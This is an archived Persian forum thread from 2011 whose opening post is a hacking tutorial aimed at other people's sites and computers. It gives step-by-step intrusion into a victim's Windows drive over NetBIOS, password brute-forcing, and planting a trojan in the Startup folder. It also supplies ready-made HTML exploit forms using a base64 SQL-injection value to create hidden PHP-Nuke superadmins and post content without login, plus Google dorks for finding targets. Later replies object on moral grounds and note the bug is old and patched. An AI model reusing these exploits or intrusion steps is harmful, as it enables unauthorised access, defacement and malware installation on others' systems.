هک سایت

واضح آرشیو وب فارسی:سایت ریسک: roohalla14th February 2011, 09:55 AMهک و سایت خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم. اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید. در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست! نفوذ به سيستم از طريق NetBios ------------------------------------------- با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید. خب بریم سره موضوع اصلی: اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید: Net use x: IPDriveName$ به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید: Net use x: 80.191.191.39c$ اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید. اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز) حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید..... هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟ پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند. <form name="mantra" method="POST" action="کاربران ثبت نام کرده قادر به مشاهده لینک می باشند"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form> خوب در قسمتی از کد نوشته شده: کاربران ثبت نام کرده قادر به مشاهده لینک می باشند به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید. به این صورت : exploit.html حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به کاربران ثبت نام کرده قادر به مشاهده لینک می باشند میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید! __________________________________________________ _____________________ آموزش هك سايتهای Php Nuke سلام خدمت تمامی دوستان خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید.. من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین. برای شروع به گوگل برید (کاربران ثبت نام کرده قادر به مشاهده لینک می باشند) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟ برای این کار کافیه این نوشته رو کپی و پیست کنید. كد: modules.php?name=Downloads این ماژول در تمامی ورژن های php nuke وجود داره. خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه ممکنه به این شکلها باشه: كد: کاربران ثبت نام کرده قادر به مشاهده لینک می باشند کاربران ثبت نام کرده قادر به مشاهده لینک می باشند کاربران ثبت نام کرده قادر به مشاهده لینک می باشند کاربران ثبت نام کرده قادر به مشاهده لینک می باشند برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه برای اینکه بدونین هست یا نه كد: modules.php?name=Downloads اینو پاک کنین و جاش بنویسید admin.php مثلآ: كد: کاربران ثبت نام کرده قادر به مشاهده لینک می باشند اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته. اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید. خوب تالا ما فرض میکنیم که admin.php وجود داره. من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید. شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید. بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید. کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس وارد سیستم مدیریت سایت بشید و سایت رو هک کنید. كد: <form name="mantra" method="POST" action="کاربران ثبت نام کرده قادر به مشاهده لینک می باشند"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form> کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید. كد: <form name="mantra" method="POST" action="کاربران ثبت نام کرده قادر به مشاهده لینک می باشند"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p> کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه. كد: <form name="mantra" method="POST" action="کاربران ثبت نام کرده قادر به مشاهده لینک می باشند"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form> خوب اینم از آموزش هک کردن سایتهای popnuke از این روش امیدوارم به کارتون بخوره اراستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید . __________________________________________________ _____________________ پيدا کردن ip يک سايت با دانستن آدرس اينترنتي آن (پيدا کردن ip سرور) سلام دوستان براي اين کار روشهاي مختلفي هست: ۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعني Status Bar پس از چند لحظه براي مدت کوتاهي ip نمايش داده مي‌شود و مي‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است مي‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکي بعد از باز کردن يک صفحه خالي به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌اي ;-) اگر اين کار را براي کاربران ثبت نام کرده قادر به مشاهده لینک می باشند*****.com انجام دهيم: که همان شماره ip براي کاربران ثبت نام کرده قادر به مشاهده لینک می باشند*****.com است. نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالاي آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا. ۲- دستور ping را در command prompt صادر کنيد: ping domain در اين حالت مي‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلي ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده مي‌کنيم). مثلا براي پيدا کردن ip مينوناز مي‌نويسم: ping minonaz.tk و جواب مي‌شنوم: :Pinging minonaz.tk [63.148.227.65] with 32 bytes of data Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=822ms TTL=111 Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 :Ping statistics for 63.148.227.65 Packets: Sent = 4, Received = 4, Lost = 0 ==> 0% loss :Approximate round trip times in milli-seconds Minimum = 811ms, Maximum = 822ms, Average = 818ms ملاحظه مي‌فرماييد که ip مينوناز 63.148.227.65 است. اگر دستور ping را به‌جاي minonaz.tk براي کاربران ثبت نام کرده قادر به مشاهده لینک می باشند minonaz.tk صادر کنيد، جواب همان است. البته براي سايت‌هاي بزرگ جواب‌هاي حاصل متفاوت خواهد بود. ۳- روش بعدي و کامل‌ترين روش whois کردن به بعضي سايت‌هاي خاص است. بعدا اين را کامل‌تر توضيح مي‌دم ولي فعلا روشش رو مي‌گم. آدرس زير را در مرورگر خود تايپ کنيد: کاربران ثبت نام کرده قادر به مشاهده لینک می باشند که به‌جاي xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا براي minonaz.tk يکي از دو آدرس زير را بايد تايپ کرد: کاربران ثبت نام کرده قادر به مشاهده لینک می باشند minonaz.tk کاربران ثبت نام کرده قادر به مشاهده لینک می باشند چيزي که در صفحه ظاهر مي‌شود به صورت زير است: whois -h magic 63.148.227.65 minonaz.tk resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65 Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255 Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05 # Enter ? for additional hints on searching ARIN"s Whois database. که آدرس ip در سطر اول و دوم ذکر شده است. اگر دو روش آخر را براي سايت بزرگ ***** انجام دهيم، نتايج زير را مي‌بينيم: FPRIVATE "TYPE=PICT;ALT=" --> روش ping : کاربران ثبت نام کرده قادر به مشاهده لینک می باشند*****.com ====> 64.58.76.229 *****.com ====> 66.218.71.198 --> روش whois : ...و کاربران ثبت نام کرده قادر به مشاهده لینک می باشند*****.com ====> 66.218.71.86 64.58.79.230 و *****.com ====> 66.218.71.198 نتايج حاصل گوياي آن است که چرا بهتر است از whois استفاده کنيم با تشکر .::روح الله ::. مهلا معین14th February 2011, 10:27 AMاوهههههههههههههههه بابا هک کن مهارتی آفرین امیر پارسا فیضی14th February 2011, 11:00 AMحوصله ندارم بخونم ولی عموم یک هکره واگر هک کنی سایت یکی رو طرف ناراحت میشود و داری با احساسات دیگران بازی می کنی اگر سایت کسی رو هک کنی. پس این کار رو انجام نده:mad: مهلا معین14th February 2011, 11:02 AMافرررررررین بچه مثبت rooya 136814th February 2011, 01:27 PMسلام از مطالب شما خیلی استفاده کردم لطفا برای جلوگیری از هک من را راهنمایی کنید rooya 136814th February 2011, 01:31 PMآیا میشه دو آی دی را بایک سیستم باز کرد امیر پارسا فیضی25th February 2011, 10:53 PMخب شما سایت هارو هک نکن و وقتی که می خواهی بری در اینترنت به جای این که سایت هک کنی به چیز های خوب ومورد نظر خود مراجعه کن;) به اهل زمین رحم کن تا اهل اسمون بهت رحم کنند>:w< امیر پارسا فیضی25th February 2011, 10:56 PMنه :shame: چطور مگه [-(فکر هک کردن را از ذهن بیرون کن :-< sami425th March 2011, 10:03 PMسلام من یه فی لتر شکن میخوام.هرچی گشتم تو سایت نبود. لطفا یه نفر که داره توی پیام خصوصی بزاره برام .ممنون roohalla13th March 2011, 07:42 AMسلام اگر ایمیل را بدی می تونم برات بفرستم MoStaSHaR17th March 2011, 03:47 PMهک و سایت خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول .................... با تشکر .::روح الله ::. با تشکر از شما دوست گرامی ولی این مطلبی که شما گذاشتی مربوط میشود به سال 2006 یعنی 5 سال پیش اون موقع هم وقتی mail w0rm این اکسپلویت رو منتشر کرد که دیگه نسشخه های آسیب پذیر nuke همگی بروز رسانی شده بودند. خود ما اولین کسایی بودیم که این باگ رو پابلیک کردیم. (کاربران ثبت نام کرده قادر به مشاهده لینک می باشند) بر روی متن بالا کلیک کنید. پس : 1. از قرار دادن مطالب منسوخ شده بپرهیزید. 2.ذکر منبع 3.از مطالب خارج ار بحث بپرهیزید. سایت ما را در گوگل محبوب کنید با کلیک روی دکمه ای که در سمت چپ این منو با عنوان +1 قرار داده شده شما به این سایت مهر تأیید میزنید و به دوستانتان در صفحه جستجوی گوگل دیدن این سایت را پیشنهاد میکنید که این امر خود باعث افزایش رتبه سایت در گوگل میشود

این صفحه را در گوگل محبوب کنید

[ارسال شده از: سایت ریسک]

[مشاهده در: www.ri3k.eu]

[تعداد بازديد از اين مطلب: 2725]